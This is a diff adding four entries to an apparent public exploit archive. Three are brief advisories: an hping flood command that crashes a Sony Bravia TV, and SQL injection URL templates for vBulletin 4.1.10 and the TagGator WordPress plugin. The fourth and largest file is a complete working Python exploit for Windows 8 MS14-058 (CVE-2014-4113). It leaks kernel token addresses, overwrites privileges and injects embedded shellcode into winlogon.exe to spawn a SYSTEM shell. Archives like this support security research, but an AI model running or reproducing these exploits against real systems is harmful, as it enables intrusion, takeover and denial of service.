diff --git a/files.csv b/files.csv
index ca195f6ab..5d89128fd 100755
--- a/files.csv
+++ b/files.csv
@@ -33438,3 +33438,7 @@ id,file,description,date,author,platform,type,port
 37057,platforms/ios/webapps/37057.txt,"Wireless Photo Transfer 3.0 iOS - File Inclusion Vulnerability",2015-05-18,Vulnerability-Lab,ios,webapps,80
 37058,platforms/multiple/webapps/37058.txt,"OYO File Manager 1.1 iOS&Android - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,multiple,webapps,8080
 37059,platforms/windows/webapps/37059.html,"ManageEngine EventLog Analyzer 10.0 Build 10001 CSRF Vulnerability",2015-05-18,"Akash S. Chavan",windows,webapps,0
+37061,platforms/multiple/dos/37061.txt,"Sony Bravia KDL-32CX525 'hping' Command Remote Denial Of Service Vulnerability",2012-04-05,"Gabriel Menezes Nunes",multiple,dos,0
+37062,platforms/php/webapps/37062.txt,"VBulletin 4.1.10 'announcementid' Parameter SQL Injection Vulnerability",2012-04-04,Am!r,php,webapps,0
+37063,platforms/php/webapps/37063.txt,"WordPress TagGator 'tagid' Parameter SQL Injection Vulnerability",2012-04-05,Am!r,php,webapps,0
+37064,platforms/win64/local/37064.py,"Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation (MS14-058)",2015-05-19,ryujin,win64,local,0
diff --git a/platforms/multiple/dos/37061.txt b/platforms/multiple/dos/37061.txt
new file mode 100755
index 000000000..9e6bfecd4
--- /dev/null
+++ b/platforms/multiple/dos/37061.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52893/info
+
+Sony Bravia is prone to a remote denial-of-service vulnerability.
+
+Successful attacks will cause the application to crash, creating a denial-of-service condition. 
+
+ hping -S TV.IP.Address -p anyport -i u1 --flood 
\ No newline at end of file
diff --git a/platforms/php/webapps/37062.txt b/platforms/php/webapps/37062.txt
new file mode 100755
index 000000000..98e5ce163
--- /dev/null
+++ b/platforms/php/webapps/37062.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52897/info
+
+VBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+VBulletin 4.1.10 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/announcement.php?a=&announcementid=[Sql] 
\ No newline at end of file
diff --git a/platforms/php/webapps/37063.txt b/platforms/php/webapps/37063.txt
new file mode 100755
index 000000000..7e9924a19
--- /dev/null
+++ b/platforms/php/webapps/37063.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52908/info
+
+TagGator is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Update Apr 9, 2012: The vendor disputes this issue stating the issue can not be exploited as described, as the reported parameter does not exist.
+
+http://www.example.com/wp-content/plugins/taggator/taggator.php?tagid=[Sql] 
\ No newline at end of file
diff --git a/platforms/win64/local/37064.py b/platforms/win64/local/37064.py
new file mode 100755
index 000000000..a3dbbb29c
--- /dev/null
+++ b/platforms/win64/local/37064.py
@@ -0,0 +1,595 @@
+# Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation (MS14-058)
+# CVE-2014-4113 Privilege Escalation
+# http://www.offensive-security.com
+# Thx to Moritz Jodeit for the beautiful writeup 
+# http://www.exploit-db.com/docs/35152.pdf 
+# Target OS Windows 8.0 - 8.1 x64
+# Author: Matteo Memelli ryujin <at> offensive-security.com
+
+from ctypes import *
+from ctypes.wintypes import *
+import struct, sys, os, time, threading, signal
+
+ULONG_PTR = PVOID = LPVOID
+HCURSOR = HICON
+PDWORD = POINTER(DWORD)
+PQWORD = POINTER(LPVOID)
+LRESULT = LPVOID
+UCHAR = c_ubyte
+QWORD = c_ulonglong
+CHAR = c_char
+NTSTATUS = DWORD
+MIIM_STRING  = 0x00000040
+MIIM_SUBMENU = 0x00000004 
+WH_CALLWNDPROC = 0x4
+GWLP_WNDPROC = -0x4
+NULL = 0x0
+SystemExtendedHandleInformation = 64
+ObjectDataInformation = 2
+STATUS_INFO_LENGTH_MISMATCH = 0xC0000004
+STATUS_BUFFER_OVERFLOW = 0x80000005L
+STATUS_INVALID_HANDLE = 0xC0000008L
+STATUS_BUFFER_TOO_SMALL = 0xC0000023L
+STATUS_SUCCESS = 0
+TOKEN_ALL_ACCESS = 0xf00ff
+DISABLE_MAX_PRIVILEGE = 0x1
+FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
+PAGE_EXECUTE_READWRITE = 0x00000040
+PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )
+VIRTUAL_MEM  = ( 0x1000 | 0x2000 )
+TH32CS_SNAPPROCESS = 0x02
+
+WinFunc1 = WINFUNCTYPE(LPVOID, INT, WPARAM, LPARAM)
+WinFunc2 = WINFUNCTYPE(HWND, LPVOID, INT, WPARAM, LPARAM)
+WNDPROC  = WINFUNCTYPE(LPVOID, HWND, UINT, WPARAM, LPARAM)
+
+bWndProcFlag = False
+bHookCallbackFlag = False
+EXPLOITED = False
+Hmenu01 = Hmenu02 = None
+
+# /*
+#  * windows/x64/exec - 275 bytes
+#  * http://www.metasploit.com
+#  * VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
+#  * CMD=cmd.exe
+#  */
+SHELLCODE = (
+"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
+"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
+"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
+"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
+"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
+"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
+"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
+"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
+"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
+"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
+"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
+"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
+"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
+"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
+"\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
+"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
+"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64"
+"\x2e\x65\x78\x65\x00")
+
+class LSA_UNICODE_STRING(Structure):
+    """Represent the LSA_UNICODE_STRING on ntdll."""
+    _fields_ = [
+        ("Length", USHORT),
+        ("MaximumLength", USHORT),
+        ("Buffer", LPWSTR),
+    ]
+
+class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure):
+    """Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll."""
+    _fields_ = [
+        ("Object", PVOID),
+        ("UniqueProcessId", PVOID),
+        ("HandleValue", PVOID),
+        ("GrantedAccess", ULONG),
+        ("CreatorBackTraceIndex", USHORT),
+        ("ObjectTypeIndex", USHORT),
+        ("HandleAttributes", ULONG),
+        ("Reserved", ULONG),
+    ]
+ 
+class SYSTEM_HANDLE_INFORMATION_EX(Structure):
+    """Represent the SYSTEM_HANDLE_INFORMATION on ntdll."""
+    _fields_ = [
+        ("NumberOfHandles", PVOID),
+        ("Reserved", PVOID),
+        ("Handles", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1),
+    ]
+
+class PUBLIC_OBJECT_TYPE_INFORMATION(Structure):
+    """Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll."""
+    _fields_ = [
+        ("Name", LSA_UNICODE_STRING),
+        ("Reserved", ULONG * 22),
+    ]
+    
+class MENUITEMINFO(Structure):
+    """Contains information about a menu item."""
+    _fields_ = [
+        ("cbSize"       , UINT),
+        ("fMask"        , UINT),
+        ("fType"        , UINT),
+        ("fState"       , UINT),
+        ("wID"          , UINT),
+        ("hSubMenu"     , HMENU),
+        ("hbmpChecked"  , HBITMAP),
+        ("hbmpUnchecked", HBITMAP),
+        ("dwItemData"   , ULONG_PTR),
+        ("dwTypeData"   , LPWSTR),
+        ("cch"          , UINT),
+        ("hbmpItem"     , HBITMAP),
+    ]
+
+class WNDCLASS(Structure):
+    """Contains the window class attributes that are registered by the 
+       RegisterClass function."""
+    _fields_ = [
+        ("style"        , UINT),
+        ("lpfnWndProc"  , WNDPROC),
+        ("cbClsExtra"   , INT),
+        ("cbWndExtra"   , INT),
+        ("hInstance"    , HINSTANCE),
+        ("hIcon"        , HCURSOR),
+        ("hCursor"      , HBITMAP),
+        ("hbrBackground", HBRUSH),
+        ("lpszMenuName" , LPWSTR),
+        ("lpszClassName", LPWSTR),
+    ]
+    
+class PROCESSENTRY32(Structure):
+    """Describes an entry from a list of the processes residing in the system
+       address space when a snapshot was taken."""
+    _fields_ = [ ( 'dwSize' , DWORD ) ,
+                 ( 'cntUsage' , DWORD) ,
+                 ( 'th32ProcessID' , DWORD) ,
+                 ( 'th32DefaultHeapID' , POINTER(ULONG)) ,
+                 ( 'th32ModuleID' , DWORD) ,
+                 ( 'cntThreads' , DWORD) ,
+                 ( 'th32ParentProcessID' , DWORD) ,
+                 ( 'pcPriClassBase' , LONG) ,
+                 ( 'dwFlags' , DWORD) ,
+                 ( 'szExeFile' , CHAR * MAX_PATH ) 
+    ]
+    
+user32                                      = windll.user32
+kernel32                                    = windll.kernel32
+ntdll                                       = windll.ntdll
+advapi32                                    = windll.advapi32
+
+user32.PostMessageW.argtypes                = [HWND, UINT, WPARAM, LPARAM]
+user32.PostMessageW.restype                 = BOOL
+user32.DefWindowProcW.argtypes              = [HWND, UINT, WPARAM, LPARAM]
+user32.DefWindowProcW.restype               = LRESULT
+user32.UnhookWindowsHook.argtypes           = [DWORD, WinFunc1]
+user32.UnhookWindowsHook.restype            = BOOL
+user32.SetWindowLongPtrW.argtypes           = [HWND, DWORD, WinFunc2]
+user32.SetWindowLongPtrW.restype            = LPVOID
+user32.CallNextHookEx.argtypes              = [DWORD, DWORD, WPARAM, LPARAM]
+user32.CallNextHookEx.restype               = LRESULT
+user32.RegisterClassW.argtypes              = [LPVOID]
+user32.RegisterClassW.restype               = BOOL
+user32.CreateWindowExW.argtypes             = [DWORD, LPWSTR, LPWSTR, DWORD, 
+                                                INT, INT, INT, INT, HWND, HMENU,
+                                                HINSTANCE, LPVOID]
+user32.CreateWindowExW.restype              = HWND
+user32.InsertMenuItemW.argtypes             = [HMENU, UINT, BOOL, LPVOID]
+user32.InsertMenuItemW.restype              = BOOL
+user32.DestroyMenu.argtypes                 = [HMENU]
+user32.DestroyMenu.restype                  = BOOL
+user32.SetWindowsHookExW.argtypes           = [DWORD, WinFunc1, DWORD, DWORD]
+user32.SetWindowsHookExW.restype            = BOOL
+user32.TrackPopupMenu.argtypes              = [HMENU, UINT, INT, INT, INT, HWND,
+                                                DWORD]
+user32.TrackPopupMenu.restype               = BOOL
+advapi32.OpenProcessToken.argtypes          = [HANDLE, DWORD , POINTER(HANDLE)]
+advapi32.OpenProcessToken.restype           = BOOL
+advapi32.CreateRestrictedToken.argtypes     = [HANDLE, DWORD, DWORD, DWORD, 
+                                                DWORD, DWORD, DWORD, DWORD,
+                                                POINTER(HANDLE)]
+advapi32.CreateRestrictedToken.restype      = BOOL
+advapi32.AdjustTokenPrivileges.argtypes     = [HANDLE, BOOL, DWORD, DWORD, 
+                                                DWORD, DWORD]
+advapi32.AdjustTokenPrivileges.restype      = BOOL
+advapi32.ImpersonateLoggedOnUser.argtypes   = [HANDLE]
+advapi32.ImpersonateLoggedOnUser.restype    = BOOL
+kernel32.GetCurrentProcess.restype          = HANDLE
+kernel32.WriteProcessMemory.argtypes        = [HANDLE, QWORD, LPCSTR, DWORD, 
+                                                POINTER(LPVOID)]
+kernel32.WriteProcessMemory.restype         = BOOL
+kernel32.OpenProcess.argtypes               = [DWORD, BOOL, DWORD]
+kernel32.OpenProcess.restype                = HANDLE
+kernel32.VirtualAllocEx.argtypes            = [HANDLE, LPVOID, DWORD, DWORD, 
+                                                DWORD]
+kernel32.VirtualAllocEx.restype             = LPVOID
+kernel32.CreateRemoteThread.argtypes        = [HANDLE, QWORD, UINT, QWORD, 
+                                                LPVOID, DWORD, POINTER(HANDLE)]
+kernel32.CreateRemoteThread.restype         = BOOL
+kernel32.CreateToolhelp32Snapshot.argtypes  = [DWORD, DWORD]
+kernel32.CreateToolhelp32Snapshot.restype   = HANDLE
+kernel32.CloseHandle.argtypes               = [HANDLE]
+kernel32.CloseHandle.restype                = BOOL
+kernel32.Process32First.argtypes            = [HANDLE, POINTER(PROCESSENTRY32)]
+kernel32.Process32First.restype             = BOOL
+kernel32.Process32Next.argtypes             = [HANDLE, POINTER(PROCESSENTRY32)]
+kernel32.Process32Next.restype              = BOOL
+kernel32.GetCurrentThreadId.restype         = DWORD
+ntdll.NtAllocateVirtualMemory.argtypes      = [HANDLE, LPVOID, ULONG, LPVOID,
+                                                ULONG, DWORD]
+ntdll.NtAllocateVirtualMemory.restype       = NTSTATUS
+ntdll.NtQueryObject.argtypes                = [HANDLE, DWORD,
+                                        POINTER(PUBLIC_OBJECT_TYPE_INFORMATION),
+                                        DWORD, DWORD]
+ntdll.NtQueryObject.restype = NTSTATUS
+ntdll.NtQuerySystemInformation.argtypes     = [DWORD, 
+                                        POINTER(SYSTEM_HANDLE_INFORMATION_EX), 
+                                        DWORD, POINTER(DWORD)]
+ntdll.NtQuerySystemInformation.restype      = NTSTATUS
+
+
+def log(msg, e=None):
+    if e == "e":
+        msg = "[!] " + msg
+    if e == "d":
+        msg = "[*] " + msg
+    else:
+        msg = "[+] " + msg
+    print msg
+
+
+def getLastError():
+    """Format GetLastError"""
+    
+    buf = create_string_buffer(2048)
+    if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,
+            kernel32.GetLastError(), 0,
+            buf, sizeof(buf), NULL):
+        log(buf.value, "e")
+    else:
+        log("Unknown Error", "e")
+    
+    
+class x_file_handles (Exception):
+    pass
+
+
+def get_type_info(handle):
+    """Get the handle type information."""
+    
+    public_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION()
+    size = DWORD(sizeof(public_object_type_information))
+    while True:
+        result = ntdll.NtQueryObject(handle, ObjectDataInformation, 
+                    byref(public_object_type_information), size, 0x0)
+        if result == STATUS_SUCCESS:
+            return public_object_type_information.Name.Buffer
+        elif result == STATUS_INFO_LENGTH_MISMATCH:
+            size = DWORD(size.value * 4)
+            resize(public_object_type_information, size.value)
+        elif result == STATUS_INVALID_HANDLE:
+            return "INVALID HANDLE: %s" % hex(handle)
+        else:
+            raise x_file_handles("NtQueryObject", hex(result))
+
+
+def get_handles():
+    """Return all the open handles in the system"""
+    
+    system_handle_information = SYSTEM_HANDLE_INFORMATION_EX()
+    size = DWORD (sizeof (system_handle_information))
+    while True:
+        result = ntdll.NtQuerySystemInformation(
+            SystemExtendedHandleInformation,
+            byref(system_handle_information),
+            size,
+            byref(size)
+        )
+        if result == STATUS_SUCCESS:
+            break
+        elif result == STATUS_INFO_LENGTH_MISMATCH:
+            size = DWORD(size.value * 4)
+            resize(system_handle_information, size.value)
+        else:
+            raise x_file_handles("NtQuerySystemInformation", hex(result))
+
+    pHandles = cast(
+        system_handle_information.Handles,
+        POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \
+                system_handle_information.NumberOfHandles)
+    )
+    for handle in pHandles.contents:
+        yield handle.UniqueProcessId, handle.HandleValue, handle.Object
+            
+            
+def WndProc(hwnd, message, wParam, lParam):
+    """Window procedure"""
+    
+    global bWndProcFlag
+    if message == 289 and not bWndProcFlag:
+        bWndProcFlag = True
+        user32.PostMessageW(hwnd, 256, 40, 0)
+        user32.PostMessageW(hwnd, 256, 39, 0)
+        user32.PostMessageW(hwnd, 513, 0, 0)
+    return user32.DefWindowProcW(hwnd, message, wParam, lParam)
+    
+    
+def hook_callback_one(code, wParam, lParam):
+    """Sets a new address for the window procedure"""
+    
+    global bHookCallbackFlag
+    if ((cast((lParam+sizeof(HANDLE)*2),PDWORD)).contents).value == 0x1eb and\
+     not bHookCallbackFlag:
+        bHookCallbackFlag = True
+        if user32.UnhookWindowsHook(WH_CALLWNDPROC, CALLBACK01):
+            # Sets a new address for the window procedure
+            log("Callback triggered!")
+            log("Setting the new address for the window procedure...")
+            lpPrevWndFunc = user32.SetWindowLongPtrW\
+             ((cast((lParam+sizeof(HANDLE)*3),PDWORD).contents).value,
+               GWLP_WNDPROC, CALLBACK02)
+    return user32.CallNextHookEx(0, code, wParam, lParam)
+
+
+def hook_callback_two(hWnd, Msg, wParam, lParam):
+    """Once called will return the fake tagWND address"""
+    
+    global EXPLOITED
+    user32.EndMenu()
+    EXPLOITED = True
+    log("Returning the fake tagWND and overwriting token privileges...")
+    return 0x00000000FFFFFFFB
+
+
+def buildMenuAndTrigger():
+    """Create menus and invoke TrackPopupMenu"""
+    
+    global Hmenu01, Hmenu02
+    log("Creating windows and menus...")
+    wndClass = WNDCLASS()
+    wndClass.lpfnWndProc = WNDPROC(WndProc)
+    wndClass.lpszClassName = u"pwned"
+    wndClass.cbClsExtra = wndClass.cbWndExtra = 0
+    
+    # Registering Class
+    if not user32.RegisterClassW(addressof(wndClass)):
+        log("RegisterClassW failed", "e")
+        sys.exit()
+        
+    # Creating the Window                                 
+    hWnd = user32.CreateWindowExW(0, u"pwned", u"pwned", 0, -1, -1, 0,
+                                  0, NULL, NULL, NULL, NULL)
+                                  
+    if not hWnd:
+        log("CreateWindowExW Failed", "e")
+        sys.exit()
+        
+    # Creating popup menu
+    user32.CreatePopupMenu.restype = HMENU
+    Hmenu01 = user32.CreatePopupMenu()
+    if not Hmenu01:
+        log("CreatePopupMenu failed 0x1", "e")
+        sys.exit()
+    Hmenu01Info = MENUITEMINFO()
+    Hmenu01Info.cbSize = sizeof(MENUITEMINFO)
+    Hmenu01Info.fMask = MIIM_STRING
+    
+    # Insert first menu
+    if not user32.InsertMenuItemW(Hmenu01, 0, True, addressof(Hmenu01Info)):
+        log("Error in InsertMenuItema 0x1", "e")
+        user32.DestroyMenu(Hmenu01)
+        sys.exit()
+        
+    # Creating second menu
+    Hmenu02 = user32.CreatePopupMenu()
+    if not Hmenu02:
+        log("CreatePopupMenu failed 0x2", "e")
+        sys.exit()
+    Hmenu02Info = MENUITEMINFO()
+    Hmenu02Info.cbSize = sizeof(MENUITEMINFO)
+    Hmenu02Info.fMask = (MIIM_STRING | MIIM_SUBMENU)
+    Hmenu02Info.dwTypeData = ""
+    Hmenu02Info.cch = 1
+    Hmenu02Info.hSubMenu = Hmenu01
+    
+    # Insert second menu
+    if not user32.InsertMenuItemW(Hmenu02, 0, True, addressof(Hmenu02Info)):
+        log("Error in InsertMenuItema 0x2", "e")
+        user32.DestroyMenu(Hmenu01)
+        user32.DestroyMenu(Hmenu01)
+        sys.exit()    
+        
+    # Set window callback
+    tid = kernel32.GetCurrentThreadId()
+    if not user32.SetWindowsHookExW(WH_CALLWNDPROC, CALLBACK01, NULL, tid):
+        log("Failed SetWindowsHookExA 0x1", "e")
+        sys.exit()
+        
+    # Crash it!
+    log("Invoking TrackPopupMenu...")  
+    user32.TrackPopupMenu(Hmenu02, 0, -10000, -10000, 0, hWnd, NULL)
+
+
+def alloctagWND():
+    """Allocate a fake tagWND in userspace at address 0x00000000fffffff0"""    
+    
+    hProcess = HANDLE(kernel32.GetCurrentProcess())
+    hToken = HANDLE()
+    hRestrictedToken = HANDLE()
+    
+    if not advapi32.OpenProcessToken(hProcess,TOKEN_ALL_ACCESS, byref(hToken)):
+        log("Could not open current process token", "e")
+        getLastError()
+        sys.exit()
+    if not advapi32.CreateRestrictedToken(hToken, DISABLE_MAX_PRIVILEGE, 0, 0, 
+                                    0, 0, 0, 0, byref(hRestrictedToken)):
+        log("Could not create the restricted token", "e")
+        getLastError()
+        sys.exit()
+    if not advapi32.AdjustTokenPrivileges(hRestrictedToken, 1, NULL, 0, 
+                                          NULL, NULL):
+        log("Could not adjust privileges to the restricted token", "e")
+        getLastError()
+        sys.exit()        
+    
+    # Leak Token addresses in kernel space
+    log("Leaking token addresses from kernel space...")
+    for pid, handle, obj in get_handles():
+        if pid==os.getpid() and get_type_info(handle) == "Token":
+            if hToken.value == handle:
+                log("Current process token address: %x" % obj)
+            if hRestrictedToken.value == handle:
+                log("Restricted token address: %x" % obj)
+                RestrictedToken = obj
+                
+    CurrentProcessWin32Process = "\x00"*8
+    # nt!_TOKEN+0x40 Privileges : _SEP_TOKEN_PRIVILEGES
+    # +0x3 overwrite Enabled in _SEP_TOKEN_PRIVILEGES, -0x8 ADD RAX,0x8 
+    TokenAddress = struct.pack("<Q", RestrictedToken+0x40+0x3-0x8)
+    tagWND = "\x41"*11 + "\x00\x00\x00\x00" +\
+     "\x42"*0xC + "\xf0\xff\xff\xff\x00\x00\x00\x00" +\
+     "\x00"*8 +\
+     "\x43"*0x145 + CurrentProcessWin32Process + "\x45"*0x58 +\
+     TokenAddress + "\x47"*0x28
+    ## Allocate space for the input buffer
+    lpBaseAddress = LPVOID(0x00000000fffffff0)
+    Zerobits      = ULONG(0)
+    RegionSize    = LPVOID(0x1000)
+    written       = LPVOID(0)                   
+    dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffffffffffff,
+                                             byref(lpBaseAddress),
+                                             0x0,
+                                             byref(RegionSize),
+                                             VIRTUAL_MEM,
+                                             PAGE_EXECUTE_READWRITE)
+    if dwStatus != STATUS_SUCCESS:
+        log("Failed to allocate tagWND object", "e")
+        getLastError()
+        sys.exit()
+    
+    # Copy input buffer to the fake tagWND                       
+    nSize = 0x200         
+    written = LPVOID(0)
+    lpBaseAddress = QWORD(0x00000000fffffff0)
+    dwStatus = kernel32.WriteProcessMemory(0xffffffffffffffff, 
+                                           lpBaseAddress, 
+                                           tagWND, 
+                                           nSize,
+                                           byref(written)) 
+    if dwStatus == 0:
+        log("Failed to copy the input buffer to the tagWND object", "e")
+        getLastError()
+        sys.exit()    
+            
+    log("Fake win32k!tagWND allocated, written %d bytes to 0x%x" %\
+     (written.value, lpBaseAddress.value))                            
+    return hRestrictedToken
+
+
+def injectShell(hPrivilegedToken):
+    """Impersonate privileged token and inject shellcode into winlogon.exe"""
+    
+    while not EXPLOITED:
+        time.sleep(0.1)
+    log("-"*70)
+    log("Impersonating the privileged token...")
+    if not advapi32.ImpersonateLoggedOnUser(hPrivilegedToken):
+        log("Could not impersonate the privileged token", "e")
+        getLastError()
+        sys.exit()
+        
+    # Get winlogon.exe pid
+    pid = getpid("winlogon.exe")
+
+    # Get a handle to the winlogon process we are injecting into 
+    hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid))
+
+    if not hProcess:
+        log("Couldn't acquire a handle to PID: %s" % pid, "e")
+        sys.exit()
+
+    log("Obtained handle 0x%x for the winlogon.exe process" % hProcess)
+    
+    # Creating shellcode buffer to inject into the host process
+    sh = create_string_buffer(SHELLCODE, len(SHELLCODE))
+    code_size = len(SHELLCODE)    
+    
+    # Allocate some space for the shellcode (in the program memory)
+    sh_address = kernel32.VirtualAllocEx(hProcess, 0, code_size, VIRTUAL_MEM, 
+                                         PAGE_EXECUTE_READWRITE)
+    if not sh_address:
+        log("Could not allocate shellcode in the remote process")
+        getLastError()
+        sys.exit()
+        
+    log("Allocated memory at address 0x%x" % sh_address)
+
+    # Inject shellcode in to winlogon.exe process space
+    written = LPVOID(0)
+    shellcode = QWORD(sh_address)
+    dwStatus = kernel32.WriteProcessMemory(hProcess, shellcode, sh, code_size, 
+                                            byref(written))
+    if not dwStatus:
+        log("Could not write shellcode into winlogon.exe", "e")
+        getLastError()
+        sys.exit()
+        
+    log("Injected %d bytes of shellcode to 0x%x" % (written.value, sh_address))
+
+    # Now we create the remote thread and point its entry routine to be head of 
+    # our shellcode
+    thread_id = HANDLE(0)
+    if not kernel32.CreateRemoteThread(hProcess, 0, 0, sh_address, 0, 0, 
+                                        byref(thread_id)):
+        log("Failed to inject shellcode into winlogon.exe")
+        sys.exit(0)
+
+    log("Remote thread  0x%08x created" % thread_id.value)
+    log("Spawning SYSTEM shell...")
+    # Kill python process to kill the window and avoid BSODs
+    os.kill(os.getpid(), signal.SIGABRT)
+
+
+def getpid(procname):
+    """ Get Process Pid by procname """
+    
+    pid = None
+    try:
+        hProcessSnap = kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
+        pe32 = PROCESSENTRY32()
+        pe32.dwSize = sizeof(PROCESSENTRY32)
+        ret = kernel32.Process32First(hProcessSnap , byref(pe32))
+        while ret:
+            if pe32.szExeFile == LPSTR(procname).value:
+                pid = pe32.th32ProcessID
+            ret = kernel32.Process32Next(hProcessSnap, byref(pe32))
+        kernel32.CloseHandle ( hProcessSnap )
+    except Exception, e:
+        log(str(e), "e")
+    if not pid:
+        log("Could not find %s PID" % procname)
+        sys.exit()
+    return pid
+
+
+CALLBACK01 = WinFunc1(hook_callback_one)    
+CALLBACK02 = WinFunc2(hook_callback_two)
+    
+    
+if __name__ == '__main__':
+    log("MS14-058 Privilege Escalation - ryujin <at> offensive-security.com", 
+        "d")
+    # Prepare the battlefield
+    hPrivilegedToken = alloctagWND()
+    # Start the injection thread
+    t1 = threading.Thread(target=injectShell, args = (hPrivilegedToken,))
+    t1.daemon = False
+    t1.start()
+    # Trigger the vuln
+    buildMenuAndTrigger()
\ No newline at end of file